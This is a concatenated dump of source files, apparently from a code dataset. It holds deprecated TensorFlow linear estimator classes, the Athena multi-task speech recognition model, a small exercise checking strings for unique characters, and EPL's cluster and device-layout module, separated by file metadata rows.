for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted classes with shape [batch_size] (or an iterable
of predicted classes if as_iterable is True). Each predicted class is
represented by its class index (i.e. integer from 0 to n_classes-1).
"""
key = prediction_key.PredictionKey.CLASSES
preds = super(LinearClassifier, self).predict(
x=x,
input_fn=input_fn,
batch_size=batch_size,
outputs=[key],
as_iterable=as_iterable)
if as_iterable:
return _as_iterable(preds, output=key)
return preds[key]
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict_proba(self, x=None, input_fn=None, batch_size=None,
as_iterable=True):
"""Returns predicted probabilities for given features.
Args:
x: features.
input_fn: Input function. If set, x and y must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted probabilities with shape [batch_size, n_classes]
(or an iterable of predicted probabilities if as_iterable is True).
"""
key = prediction_key.PredictionKey.PROBABILITIES
preds = super(LinearClassifier, self).predict(
x=x,
input_fn=input_fn,
batch_size=batch_size,
outputs=[key],
as_iterable=as_iterable)
if as_iterable:
return _as_iterable(preds, output=key)
return preds[key]
@deprecated("2017-03-25", "Please use Estimator.export_savedmodel() instead.")
def export(self,
export_dir,
input_fn=None,
input_feature_key=None,
use_deprecated_input_fn=True,
signature_fn=None,
default_batch_size=1,
exports_to_keep=None):
"""See BaseEstimator.export."""
def default_input_fn(unused_estimator, examples):
return layers.parse_feature_columns_from_examples(
examples, self._feature_columns)
return super(LinearClassifier, self).export(
export_dir=export_dir,
input_fn=input_fn or default_input_fn,
input_feature_key=input_feature_key,
use_deprecated_input_fn=use_deprecated_input_fn,
signature_fn=(signature_fn or
export.classification_signature_fn_with_prob),
prediction_key=prediction_key.PredictionKey.PROBABILITIES,
default_batch_size=default_batch_size,
exports_to_keep=exports_to_keep)
class LinearRegressor(estimator.Estimator):
"""Linear regressor model.
THIS CLASS IS DEPRECATED. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for general migration instructions.
Train a linear regression model to predict label value given observation of
feature values.
Example:
```python
sparse_column_a = sparse_column_with_hash_bucket(...)
sparse_column_b = sparse_column_with_hash_bucket(...)
sparse_feature_a_x_sparse_feature_b = crossed_column(...)
estimator = LinearRegressor(
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b])
# Input builders
def input_fn_train: # returns x, y
...
def input_fn_eval: # returns x, y
...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a KeyError:
* if `weight_column_name` is not `None`:
key=weight_column_name, value=a `Tensor`
* for column in `feature_columns`:
- if isinstance(column, `SparseColumn`):
key=column.name, value=a `SparseTensor`
- if isinstance(column, `WeightedSparseColumn`):
{key=id column name, value=a `SparseTensor`,
key=weight column name, value=a `SparseTensor`}
- if isinstance(column, `RealValuedColumn`):
key=column.name, value=a `Tensor`
"""
def __init__(self, # _joint_weights: pylint: disable=invalid-name
feature_columns,
model_dir=None,
weight_column_name=None,
optimizer=None,
gradient_clip_norm=None,
enable_centered_bias=False,
label_dimension=1,
_joint_weights=False,
config=None,
feature_engineering_fn=None):
"""Construct a `LinearRegressor` estimator object.
Args:
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
model_dir: Directory to save model parameters, graph, etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: An instance of `tf.Optimizer` used to train the model. If
`None`, will use an Ftrl optimizer.
gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
label_dimension: Number of regression targets per example. This is the
size of the last dimension of the labels and logits `Tensor` objects
(typically, these have shape `[batch_size, label_dimension]`).
_joint_weights: If True use a single (possibly partitioned) variable to
store the weights. It's faster, but requires all feature columns are
sparse and have the 'sum' combiner. Incompatible with SDCAOptimizer.
config: `RunConfig` object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
labels which are the output of `input_fn` and
returns features and labels which will be fed
into the model.
Returns:
A `LinearRegressor` estimator.
"""
self._feature_columns = tuple(feature_columns or [])
assert self._feature_columns
chief_hook = None
if (isinstance(optimizer, sdca_optimizer.SDCAOptimizer) and
enable_centered_bias):
enable_centered_bias = False
logging.warning("centered_bias is not supported with SDCA, "
"please disable it explicitly.")
head = head_lib.regression_head(
weight_column_name=weight_column_name,
label_dimension=label_dimension,
enable_centered_bias=enable_centered_bias)
params = {
"head": head,
"feature_columns": feature_columns,
"optimizer": optimizer,
}
if isinstance(optimizer, sdca_optimizer.SDCAOptimizer):
assert label_dimension == 1, "SDCA only applies for label_dimension=1."
assert not _joint_weights, ("_joint_weights is incompatible with"
" SDCAOptimizer.")
model_fn = sdca_model_fn
# The model_fn passes the model parameters to the chief_hook. We then use
# the hook to update weights and shrink step only on the chief.
chief_hook = _SdcaUpdateWeightsHook()
params.update({
"weight_column_name": weight_column_name,
"update_weights_hook": chief_hook,
})
else:
model_fn = _linear_model_fn
params.update({
"gradient_clip_norm": gradient_clip_norm,
"joint_weights": _joint_weights,
})
super(LinearRegressor, self).__init__(
model_fn=model_fn,
model_dir=model_dir,
config=config,
params=params,
feature_engineering_fn=feature_engineering_fn)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
@deprecated_arg_values(
"2017-03-01",
"Please switch to predict_scores, or set `outputs` argument.",
outputs=None)
def predict(self, x=None, input_fn=None, batch_size=None, outputs=None,
as_iterable=True):
"""Returns predictions for given features.
By default, returns predicted scores. But this default will be dropped
soon. Users should either pass `outputs`, or call `predict_scores` method.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
outputs: list of `str`, name of the output to predict.
If `None`, returns scores.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted scores (or an iterable of predicted scores if
as_iterable is True). If `label_dimension == 1`, the shape of the output
is `[batch_size]`, otherwise the shape is `[batch_size, label_dimension]`.
If `outputs` is set, returns a dict of predictions.
"""
if not outputs:
return self.predict_scores(
x=x,
input_fn=input_fn,
batch_size=batch_size,
as_iterable=as_iterable)
return super(LinearRegressor, self).predict(
x=x,
input_fn=input_fn,
batch_size=batch_size,
outputs=outputs,
as_iterable=as_iterable)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict_scores(self, x=None, input_fn=None, batch_size=None,
as_iterable=True):
"""Returns predicted scores for given features.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted scores (or an iterable of predicted scores if
as_iterable is True). If `label_dimension == 1`, the shape of the output
is `[batch_size]`, otherwise the shape is `[batch_size, label_dimension]`.
"""
key = prediction_key.PredictionKey.SCORES
preds = super(LinearRegressor, self).predict(
x=x,
input_fn=input_fn,
batch_size=batch_size,
outputs=[key],
as_iterable=as_iterable)
if as_iterable:
return _as_iterable(preds, output=key)
return preds[key]
@deprecated("2017-03-25", "Please use Estimator.export_savedmodel() instead.")
def export(self,
export_dir,
input_fn=None,
input_feature_key=None,
use_deprecated_input_fn=True,
signature_fn=None,
default_batch_size=1,
exports_to_keep=None):
"""See BaseEstimator.export."""
def default_input_fn(unused_estimator, examples):
return layers.parse_feature_columns_from_examples(
examples, self._feature_columns)
return super(LinearRegressor, self).export(
export_dir=export_dir,
input_fn=input_fn or default_input_fn,
input_feature_key=input_feature_key,
use_deprecated_input_fn=use_deprecated_input_fn,
signature_fn=(signature_fn or export.regression_signature_fn),
prediction_key=prediction_key.PredictionKey.SCORES,
default_batch_size=default_batch_size,
exports_to_keep=exports_to_keep)
class LinearEstimator(estimator.Estimator):
"""Linear model with user specified head.
THIS CLASS IS DEPRECATED. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for general migration instructions.
Train a generalized linear model to predict label value given observation of
feature values.
Example:
To do poisson regression,
```python
sparse_column_a = sparse_column_with_hash_bucket(...)
sparse_column_b = sparse_column_with_hash_bucket(...)
sparse_feature_a_x_sparse_feature_b = crossed_column(...)
estimator = LinearEstimator(
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b],
head=head_lib.poisson_regression_head())
# Input builders
def input_fn_train: # returns x, y
...
def input_fn_eval: # returns x, y
...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a KeyError:
* if `weight_column_name` is not `None`:
key=weight_column_name, value=a `Tensor`
* for column in `feature_columns`:
- if isinstance(column, `SparseColumn`):
key=column.name, value=a `SparseTensor`
- if isinstance(column, `WeightedSparseColumn`):
{key=id column name, value=a `SparseTensor`,
key=weight column name, value=a `SparseTensor`}
- if isinstance(column, `RealValuedColumn`):
key=column.name, value=a `Tensor`
"""
def __init__(self, # _joint_weights: pylint: disable=invalid-name
feature_columns,
head,
model_dir=None,
weight_column_name=None,
optimizer=None,
gradient_clip_norm=None,
_joint_weights=False,
config=None,
feature_engineering_fn=None):
"""Construct a `LinearEstimator` object.
Args:
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
head: An instance of _Head class.
model_dir: Directory to save model parameters, graph, etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: An instance of `tf.Optimizer` used to train the model. If
`None`, will use an Ftrl optimizer.
gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
_joint_weights: If True use a single (possibly partitioned) variable to
store the weights. It's faster, but requires all feature columns are
sparse and have the 'sum' combiner. Incompatible with SDCAOptimizer.
config: `RunConfig` object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
labels which are the output of `input_fn` and
returns features and labels which will be fed
into the model.
Returns:
A `LinearEstimator` estimator.
Raises:
ValueError: if optimizer is not supported, e.g., SDCAOptimizer
"""
assert feature_columns
if isinstance(optimizer, sdca_optimizer.SDCAOptimizer):
raise ValueError("LinearEstimator does not support SDCA optimizer.")
params = {
"head": head,
"feature_columns": feature_columns,
"optimizer": optimizer,
"gradient_clip_norm": gradient_clip_norm,
"joint_weights": _joint_weights,
}
super(LinearEstimator, self).__init__(
model_fn=_linear_model_fn,
model_dir=model_dir,
config=config,
params=params,
feature_engineering_fn=feature_engineering_fn)
| 40.660224 | 96 | 0.680577 |
0d5d0ca486428bc658f33f55e1bcd1cd2ea77f3b | 7,095 | py | Python | athena/models/mtl_seq2seq.py | wgfi110/athena | e704884ec6a3a947769d892aa267578038e49ecb | [
"Apache-2.0"
] | 791 | 2019-12-22T03:09:04.000Z | 2022-03-26T01:57:42.000Z | athena/models/mtl_seq2seq.py | wgfi110/athena | e704884ec6a3a947769d892aa267578038e49ecb | [
"Apache-2.0"
] | 198 | 2019-12-22T03:06:27.000Z | 2022-03-29T02:57:59.000Z | athena/models/mtl_seq2seq.py | wgfi110/athena | e704884ec6a3a947769d892aa267578038e49ecb | [
"Apache-2.0"
] | 194 | 2019-12-24T03:59:29.000Z | 2022-03-25T02:44:51.000Z | # coding=utf-8
# Copyright (C) 2019 ATHENA AUTHORS; Xiangang Li; Dongwei Jiang; Wubo Li
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Only support eager mode and TF>=2.0.0
# pylint: disable=no-member, invalid-name, relative-beyond-top-level
# pylint: disable=too-many-locals, too-many-statements, too-many-arguments, too-many-instance-attributes
""" a implementation of multi-task model with attention and ctc loss """
import io
import tensorflow as tf
from tensorflow.keras.layers import Dense
from .base import BaseModel
from ..loss import CTCLoss
from ..metrics import CTCAccuracy
from .speech_transformer import SpeechTransformer, SpeechTransformer2
from ..utils.hparam import register_and_parse_hparams
class MtlTransformerCtc(BaseModel):
""" In speech recognition, adding CTC loss to Attention-based seq-to-seq model is known to
help convergence. It usually gives better results than using attention alone.
"""
SUPPORTED_MODEL = {
"speech_transformer": SpeechTransformer,
"speech_transformer2": SpeechTransformer2,
}
default_config = {
"model": "speech_transformer",
"model_config": {"return_encoder_output": True},
"mtl_weight": 0.5
}
def __init__(self, data_descriptions, config=None):
super().__init__()
self.num_class = data_descriptions.num_class + 1
self.sos = self.num_class - 1
self.eos = self.num_class - 1
self.hparams = register_and_parse_hparams(self.default_config, config, cls=self.__class__)
self.loss_function = CTCLoss(blank_index=-1)
self.metric = CTCAccuracy()
self.model = self.SUPPORTED_MODEL[self.hparams.model](
data_descriptions, self.hparams.model_config
)
self.time_propagate = self.model.time_propagate
self.decoder = Dense(self.num_class)
# for deployment
self.deploy_encoder = None
self.deploy_decoder = None
# for WFST
self.vocab = {}
if data_descriptions.hparams.text_config["type"] == "vocab":
for line in io.open(data_descriptions.hparams.text_config["model"], 'r', encoding='utf-8').readlines():
char, idx = line.strip().split()[0], line.strip().split()[1]
self.vocab[char] = int(idx)
# we need dict of words for WFST decoding
if data_descriptions.hparams.words is not None:
self.words = []
for line in io.open(data_descriptions.hparams.words, 'r', encoding='utf-8').readlines():
word = line.strip().split()[0]
self.words.append(word)
def call(self, samples, training=None):
""" call function in keras layers """
attention_logits, encoder_output = self.model(samples, training=training)
ctc_logits = self.decoder(encoder_output, training=training)
return attention_logits, ctc_logits
def get_loss(self, outputs, samples, training=None):
""" get loss used for training """
attention_logits, ctc_logits = outputs
logit_length = self.compute_logit_length(samples)
extra_loss = self.loss_function(ctc_logits, samples, logit_length)
self.metric(ctc_logits, samples, logit_length)
main_loss, metrics = self.model.get_loss(attention_logits, samples, training=training)
mtl_weight = self.hparams.mtl_weight
loss = mtl_weight * main_loss + (1.0 - mtl_weight) * extra_loss
metrics[self.metric.name] = self.metric.result()
return loss, metrics
def compute_logit_length(self, samples):
""" compute the logit length """
return self.model.compute_logit_length(samples)
def reset_metrics(self):
""" reset the metrics """
self.metric.reset_states()
self.model.reset_metrics()
def restore_from_pretrained_model(self, pretrained_model, model_type=""):
""" A more general-purpose interface for pretrained model restoration
Args:
pretrained_model: checkpoint path of mpc model
model_type: the type of pretrained model to restore
"""
self.model.restore_from_pretrained_model(pretrained_model, model_type)
def decode(self, samples, hparams, decoder):
"""
Initialization of the model for decoding,
decoder is called here to create predictions
Args:
samples: the data source to be decoded
hparams: decoding configs are included here
decoder: it contains the main decoding operations
Returns::
predictions: the corresponding decoding results
"""
encoder_output, input_mask = self.model.decode(samples, hparams, decoder, return_encoder=True)
# init op
last_predictions = tf.ones([1], dtype=tf.int32) * self.sos
history_predictions = tf.TensorArray(
tf.int32, size=1, dynamic_size=True, clear_after_read=False
)
history_predictions.write(0, last_predictions)
history_predictions = history_predictions.stack()
init_cand_states = [history_predictions]
step = 0
if hparams.decoder_type == "beam_search_decoder" and hparams.ctc_weight != 0 and decoder.ctc_scorer is not None:
ctc_logits = self.decoder(encoder_output, training=False)
ctc_logits = tf.math.log(tf.nn.softmax(ctc_logits))
init_cand_states = decoder.ctc_scorer.initial_state(init_cand_states, ctc_logits)
if hparams.decoder_type == "beam_search_decoder":
predictions = decoder(
history_predictions, init_cand_states, step, (encoder_output, input_mask)
)
elif hparams.decoder_type == "wfst_decoder":
initial_packed_states = (0,) # this is basically decoding step
decoder.decode((encoder_output, input_mask), initial_packed_states, self.model.inference_one_step)
words_prediction_id = decoder.get_best_path()
words_prediction = ''.join([self.words[int(idx)] for idx in words_prediction_id])
predictions = [self.vocab[prediction] for prediction in words_prediction]
predictions = tf.constant([predictions])
predictions = tf.cast(predictions, tf.int64)
return predictions
def deploy(self):
""" deployment function """
self.model.deploy()
self.deploy_encoder = self.model.deploy_encoder
self.deploy_decoder = self.model.deploy_decoder
| 43.262195 | 120 | 0.671177 |
bcd2cdeb33a42753f9f0458189e936d2a041f155 | 591 | py | Python | Udemy/UniqueCharacter.py | batumoglu/Python_Algorithms | f586f386693eaddb64d6a654a89af177fd0e838f | [
"MIT"
] | null | null | null | Udemy/UniqueCharacter.py | batumoglu/Python_Algorithms | f586f386693eaddb64d6a654a89af177fd0e838f | [
"MIT"
] | null | null | null | Udemy/UniqueCharacter.py | batumoglu/Python_Algorithms | f586f386693eaddb64d6a654a89af177fd0e838f | [
"MIT"
] | null | null | null | def uni_char1(s):
return len(set(s)) == len(s)
def uni_char2(s):
chars = set()
for letter in s:
if letter in chars:
return False
else:
chars.add(letter)
return True
from nose.tools import assert_equal
class TestUnique(object):
def test(self, sol):
assert_equal(sol(''), True)
assert_equal(sol('goo'), False)
assert_equal(sol('abcdefg'), True)
print('ALL TEST CASES PASSED')
if __name__ == "__main__":
t = TestUnique()
t.test(uni_char1)
t = TestUnique()
t.test(uni_char2) | 21.888889 | 42 | 0.57868 |
3b940402ffaa327c1c58ff451abbdf588c06f0c9 | 16,334 | py | Python | epl/cluster.py | Fazziekey/EasyParallelLibrary | 75a817aa83fbde109f1698e14e02cbf1ab5c934c | [
"Apache-2.0"
] | 1 | 2022-03-09T07:40:47.000Z | 2022-03-09T07:40:47.000Z | python/epl/cluster.py | chenyang472043503/EasyParallelLibrary | cd2873fe04c86c62e55418129ba2f1dc83d222b4 | [
"Apache-2.0"
] | null | null | null | python/epl/cluster.py | chenyang472043503/EasyParallelLibrary | cd2873fe04c86c62e55418129ba2f1dc83d222b4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Cluster for grouping devices into serveral slices."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import numpy as np
from tensorflow.python.client import device_lib
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import server_lib
from epl.env import Env
from epl.ir.graph import Graph
from epl.utils import common
from epl.utils import constant
from epl.utils import metric
class VirtualDevice(object):
"""Devices for one task graph"""
def __init__(self, index, slice_devices, worker_index, local_device_indices=None):
"""
Initialize a VirtualDevice object.
Args:
index: virtual device index.
slice_devices: a list of device tuple.
worker_index: current worker index.
local_device_indices: indices to get local indices.
"""
self._index = index
self._worker_index = worker_index
self._slice_devices = slice_devices
self._all_devices = tuple(np.reshape(slice_devices, [-1]))
if self._index == 0:
# constructor
self._local_device_indices = tuple(idx for idx, device in enumerate(self._all_devices) if self._device_in_local_worker(device))
else:
if local_device_indices is None:
raise RuntimeError("local_device_indices is required for non-constructors")
self._local_device_indices = local_device_indices
self._local_devices = tuple(self._all_devices[idx] for idx in self._local_device_indices)
@property
def local_devices(self):
return self._local_devices
@property
def local_device_indices(self):
return self._local_device_indices
@property
def all_devices(self):
return self._all_devices
def get_device(self, replica_idx, device_idx):
"""
Args:
replica_idx: replica index.
device_idx: device index for certain replica.
"""
return self._slice_devices[replica_idx][device_idx]
def _device_in_local_worker(self, device):
return common.get_task_index_from_device_str(device) == self._worker_index
@property
def num_replicas(self):
"""Global number of replicas."""
return len(self._all_devices) if self._all_devices else 1
def __str__(self):
return str(self._slice_devices)
def __repr__(self):
return self.__str__()
class LayoutImpl(object):
@staticmethod
def slice(layout_info, clus):
raise NotImplementedError
class AllLayout(LayoutImpl):
"""Make all devices into one slice."""
@staticmethod
def slice(layout_info, clus):
slices = [[]]
for worker_index in range(clus.worker_num):
for gpu_index in range(clus.gpu_num_per_worker):
slices[0].append([
common.get_device_string(task=worker_index, device_index=gpu_index)
])
return slices
def get_device_list(worker_num, gpu_num_per_worker, prefer_row=True):
"""Get a list of devices from each worker."""
if prefer_row:
for worker_index in range(worker_num):
for gpu_index in range(gpu_num_per_worker):
yield common.get_device_string(task=worker_index, device_index=gpu_index)
else:
for gpu_index in range(gpu_num_per_worker):
for worker_index in range(worker_num):
yield common.get_device_string(task=worker_index, device_index=gpu_index)
def generate_device_slices(cluster, device_per_replicas, num_replica):
"""Generate device slices."""
num_taskgraph = len(device_per_replicas)
slices = [[[] for _ in range(num_replica)] for _ in range(num_taskgraph)]
prefer_row = Env.get().config.cluster.device_place_prefer_intra_node
all_devices = get_device_list(cluster.worker_num, cluster.gpu_num_per_worker, prefer_row)
for replica_id in range(num_replica):
for ti in range(num_taskgraph):
for _ in range(device_per_replicas[ti]):
slices[ti][replica_id].append(next(all_devices))
return slices
class AutoLayout(LayoutImpl):
"""Group devices into slices automatically based on taskgraphs."""
@staticmethod
def slice(layout_info, clus):
# TODO(sayang): Support fuse/cross nodes.
taskgraphs = Graph.get().taskgraphs
total_device_num = clus.worker_num * clus.gpu_num_per_worker
num_device_per_replica = sum(tg.num_device_per_replica for tg in taskgraphs)
if total_device_num % num_device_per_replica != 0:
raise RuntimeError("Total devices {} is not divisible by num_device_per_replica {}".format(total_device_num, num_device_per_replica))
num_replica = total_device_num // num_device_per_replica
device_per_replicas = [tg.num_device_per_replica for tg in taskgraphs]
return generate_device_slices(clus, device_per_replicas, num_replica)
class SpecificLayout(LayoutImpl):
"""Use slices specified by users."""
@staticmethod
def slice(layout_info, clus):
return layout_info
class AwareRowLayout(LayoutImpl):
"""Slice cluster in row way with aware net topology."""
@staticmethod
def slice(layout_info, clus):
gpu_num_per_slice = int(layout_info)
total_worker_num = len(clus.hosts.split(","))
slice_num = int(total_worker_num / gpu_num_per_slice)
if clus.gpu_num_per_worker != 1 or slice_num == 0 \
or total_worker_num % slice_num != 0:
raise RuntimeError(
"GPU per-worker is not 1, or total GPU number "
"is not divisible by stage number. Total machine"
": %s, GPU per-worker: %s, stage: %s." %
(total_worker_num, clus.gpu_num_per_worker, slice_num))
slices = [[] for unused_x in range(slice_num)]
gpu_index = 0
for worker_index in range(total_worker_num):
slice_index = worker_index / gpu_num_per_slice
slices[int(slice_index)].append(
[common.get_device_string(task=worker_index, device_index=gpu_index)])
return slices
@staticmethod
def reorder_hosts(clus):
""" Reorder hosts and reset worker_index."""
# Group workers by machine
hosts = clus.hosts.split(",")
workers_group_by_machine = {}
for idx_worker, host in enumerate(hosts):
host_name = host.split(":")[0]
if host_name not in workers_group_by_machine:
workers_group_by_machine[host_name] = []
workers_group_by_machine[host_name].append(idx_worker)
# Check number of workers for each machine
worker_num_per_machine = 0
for key in workers_group_by_machine:
if worker_num_per_machine == 0:
worker_num_per_machine = len(workers_group_by_machine[key])
elif worker_num_per_machine != len(workers_group_by_machine[key]):
raise RuntimeError("Number of workers must be " \
"the same for each machine.")
clus.worker_num_per_machine = worker_num_per_machine
# Reorder hosts
new_hosts = ""
for key in workers_group_by_machine:
host_temp = ""
for worker in workers_group_by_machine[key]:
if not host_temp:
host_temp = hosts[worker]
else:
host_temp = host_temp + "," + hosts[worker]
# Rank 0 must be the same after reordering
if not new_hosts:
new_hosts = host_temp
elif workers_group_by_machine[key][0] == 0:
new_hosts = host_temp + "," + new_hosts
else:
new_hosts = new_hosts + "," + host_temp
tf_logging.info("Reorder hosts by AwareRowLayout,"
" origin hosts: {}, new hosts: {}" \
.format(clus.hosts, new_hosts))
clus.hosts = new_hosts
# Reset worker_index
new_hosts_list = new_hosts.split(",")
for idx_worker, host in enumerate(new_hosts_list):
if hosts[clus.worker_index] == host:
clus.worker_index = idx_worker
break
class Layout(object):
"""Layout of slicing cluster to slices."""
def __init__(self, layout):
self._data = {}
if isinstance(layout, str):
self._data[layout] = "none"
else:
self._data = dict(layout)
def __getattr__(self, name):
if name in self._data:
return self._data[name]
return None
def __str__(self):
return str(self._data)
def __repr__(self):
return self.__str__()
def slice(self, clus):
"""Slice cluster to slices."""
total_state = \
int(bool(self.specific)) + \
int(bool(self.all)) + \
int(bool(self.auto))
if total_state > 1:
raise ValueError("Can't set multiple layout to slice cluster. Layout: %s" % self)
if self.all:
return AllLayout.slice(self.all, clus)
if self.specific:
return SpecificLayout.slice(self.specific, clus)
if self.aware_row:
return AwareRowLayout.slice(self.aware_row, clus)
if self.auto:
return AutoLayout.slice(self.auto, clus)
raise RuntimeError("Layout is not supported. Layout: %s ." % self)
def reorder_hosts(self, clus):
"""Reorder hosts and reset worker_index for cluster."""
if self.aware_row:
AwareRowLayout.reorder_hosts(clus)
class Cluster(object): # pylint: disable=invalid-name
"""epl cluster."""
def __init__(self,
worker_hosts=None,
ps_hosts=None,
job_name=constant.DEFAULT_TASK_NAME,
worker_index=0,
layout="all"):
# Try to get hosts information from TF_CONFIG if worker hosts is None.
if not worker_hosts:
tf_config = os.environ.get(constant.ENV_TF_CONFIG)
if not tf_config:
# Construct TF_CONFIG to schedule a server even for one worker.
tf_logging.info("Training as a single worker for no TF_CONFIG found.")
# Specifying port 0 means that the OS will choose a free port for the
# server.
tf_config = '{"cluster":{"worker":["127.0.0.1:0"]},"task":' \
'{"type":"worker","index":0}}'
tf_config_json = json.loads(tf_config)
tf_config_worker_hosts = tf_config_json.get("cluster", {}).get("worker")
tf_config_ps_hosts = tf_config_json.get("cluster", {}).get("ps")
tf_config_chief_hosts = tf_config_json.get("cluster", {}).get("chief")
tf_config_job_name = tf_config_json.get("task", {}).get("type")
tf_config_task_index = tf_config_json.get("task", {}).get("index")
if tf_config_chief_hosts:
if not tf_config_worker_hosts:
tf_config_worker_hosts = tf_config_chief_hosts
else:
# Put chief host before worker hosts to treat chief as worker 0.
tf_config_worker_hosts = \
tf_config_chief_hosts + tf_config_worker_hosts
if tf_config_job_name == constant.DEFAULT_TASK_NAME:
tf_config_task_index += 1
if tf_config_job_name == constant.CHIEF_WORKER_NAME:
tf_config_job_name = constant.DEFAULT_TASK_NAME
if tf_config_worker_hosts is None or tf_config_job_name is None \
or tf_config_task_index is None:
raise ValueError("Get hosts information failed for incomplete "
"TF_CONFIG: %s." % tf_config)
worker_hosts = ",".join(tf_config_worker_hosts)
if tf_config_ps_hosts:
ps_hosts = ",".join(tf_config_ps_hosts)
job_name = tf_config_job_name
worker_index = tf_config_task_index
if not ps_hosts:
hosts = worker_hosts
self._worker_index = worker_index
else: # support ps_hosts and process as worker_hosts
hosts = worker_hosts + "," + ps_hosts
worker_list = worker_hosts.split(",")
worker_num = len(worker_list)
if job_name == constant.DEFAULT_TASK_NAME:
self._worker_index = worker_index
else:
self._worker_index = worker_index + worker_num
self._hosts = hosts
self._worker_num = len(hosts.split(","))
self._worker_num_per_machine = 1
self._cluster_spec = \
server_lib.ClusterSpec({
constant.DEFAULT_TASK_NAME: self._hosts.split(",")})
self._available_devices = self.available_gpus()
self.set_default_device()
self._layout = None
self._layout_type = layout
self._virtual_devices = []
if layout:
self.generate_virtual_devices()
tf_logging.info(self)
# add metric
if self._worker_index == 0:
metric.add_metric(constant.DISTRIBUTED_FRAMEWORK,
constant.DISTRIBUTED_FRAMEWORK_NAME)
def generate_virtual_devices(self, layout=None):
"""Generate virtual devices"""
if self._virtual_devices:
tf_logging.warn("Virtual devices are not empty, return existing ones.")
return self._virtual_devices
layout_type = layout if layout else self._layout_type
self._layout = Layout(layout_type)
self._layout.reorder_hosts(self)
self._slices = self._layout.slice(self)
local_device_indices = None
for index, devices in enumerate(self._slices):
vd = VirtualDevice(index, devices, self._worker_index, local_device_indices)
self._virtual_devices.append(vd)
if index == 0:
local_device_indices = vd.local_device_indices
return self._virtual_devices
@property
def virtual_devices(self):
return self._virtual_devices
def available_gpus(self):
"""Get available gpu list."""
config = Env.get().get_config_proto()
local_device_protos = device_lib.list_local_devices(config)
count = len(
[x.name for x in local_device_protos if x.device_type == "GPU"])
devices = []
for gpu_idx in range(count):
devices.append(
common.get_device_string(task=self._worker_index, device_index=gpu_idx))
return devices
def current_worker_chief_gpu(self):
return common.get_device_string(task=self._worker_index)
def current_worker_cpu(self):
return common.get_device_string(task=self._worker_index, device_type="CPU")
def set_default_device(self, tf_graph=None):
"""Set default device as GPU for tf graph."""
if tf_graph is None:
tf_graph = common.get_default_tf_graph()
if not tf_graph._graph_device_function_stack._stack: # pylint: disable=protected-access
tf_graph._add_device_to_stack(self.current_worker_chief_gpu()) # pylint: disable=protected-access
def get_local_rank(self, global_rank):
return global_rank % self.gpu_num_per_worker
@property
def worker_index(self):
return self._worker_index
@worker_index.setter
def worker_index(self, worker_index):
